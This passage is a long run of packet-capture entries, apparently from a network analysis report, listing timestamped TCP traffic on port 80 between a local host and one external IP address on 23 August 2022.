                                                                                                                                                                      Aug 23, 2022 18:27:52.341239929 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341248989 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341267109 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341278076 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341295004 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341308117 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341326952 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341336966 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341366053 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341366053 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341377974 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341394901 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341418982 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341423988 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341435909 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341453075 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341468096 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341500044 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341583014 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341615915 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341634035 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341645002 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341665983 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341675043 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341695070 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341705084 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341726065 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341733932 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341751099 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341763020 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341784954 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341793060 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341804981 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341821909 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341836929 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341851950 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341871023 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341880083 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341895103 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341911077 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341926098 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341941118 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341960907 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.341969013 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.341999054 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342024088 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342027903 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342031002 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342048883 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342056990 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342067003 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342086077 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342106104 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342114925 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342134953 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342144012 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342158079 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342174053 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342191935 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342201948 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342221022 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342231035 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342252970 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342259884 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342274904 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342288971 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342314959 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342317104 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342327118 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342345953 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342369080 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342375994 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342396975 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342432022 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342451096 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342459917 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342480898 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342490911 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342510939 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342520952 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342538118 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342550993 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342570066 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342581034 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342600107 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342609882 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342628002 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342641115 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342654943 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342672110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342694998 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342700958 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342716932 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342731953 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342751980 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342761993 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342787981 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342794895 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342818975 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342825890 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342848063 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342855930 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342878103 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342885017 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342909098 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342914104 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342927933 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342943907 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342972994 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.342973948 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.342988968 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343004942 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343027115 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343034029 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343058109 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343065977 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343082905 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343095064 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343116045 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343123913 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343143940 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343152046 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343175888 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343179941 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343205929 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343209028 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343240023 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343239069 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343269110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343271971 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.343291998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343313932 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.343461990 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.351126909 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351166964 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351186037 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351206064 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351227045 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351247072 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351253033 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.351267099 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351289034 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351298094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.351310015 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351326942 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.351330042 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.351393938 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.351403952 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.356478930 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356502056 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356519938 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356539011 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356559038 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356576920 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356585979 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.356597900 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356615067 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356631041 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356645107 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356652021 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.356657982 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.356693983 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356715918 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356743097 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356762886 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356781960 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356796980 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.356916904 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356934071 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.356947899 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.356971025 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357023954 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357034922 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357053995 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357065916 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357081890 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357105017 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357108116 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357136011 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357146978 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357151985 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357161999 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357172966 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357191086 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357199907 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357219934 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357227087 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357245922 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357253075 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357276917 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357284069 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357294083 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357306004 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357331991 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357336998 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357358932 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357371092 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357381105 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357386112 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357412100 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357415915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357430935 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357439995 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357455969 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357465982 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357500076 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357527018 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357528925 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357561111 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357572079 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357589006 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357610941 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357616901 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357635021 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357645035 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357670069 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357671976 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357692003 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357700109 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357714891 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357727051 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357753038 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357779026 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357805967 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357829094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357832909 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357842922 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357856989 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357860088 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357862949 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357868910 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357887983 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357909918 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357913971 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357918024 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357928038 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357942104 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357961893 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357969046 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.357990026 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.357996941 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358012915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358025074 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358052969 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358057022 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358078003 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358092070 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358105898 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358112097 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358120918 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358134031 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358161926 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358172894 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358180046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358189106 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358213902 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358217001 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358228922 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358244896 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358254910 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358274937 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358282089 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358303070 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358313084 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358330011 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358347893 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358357906 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358364105 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358385086 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358412027 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358437061 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358437061 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358448029 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358453035 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358467102 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358488083 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358494997 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358511925 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358531952 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358546019 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358561993 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358571053 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358591080 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358606100 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358618975 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358628035 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358647108 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358660936 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358675957 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358697891 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358711004 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358721018 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.358741045 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.358755112 CEST4994780192.168.2.688.198.122.116
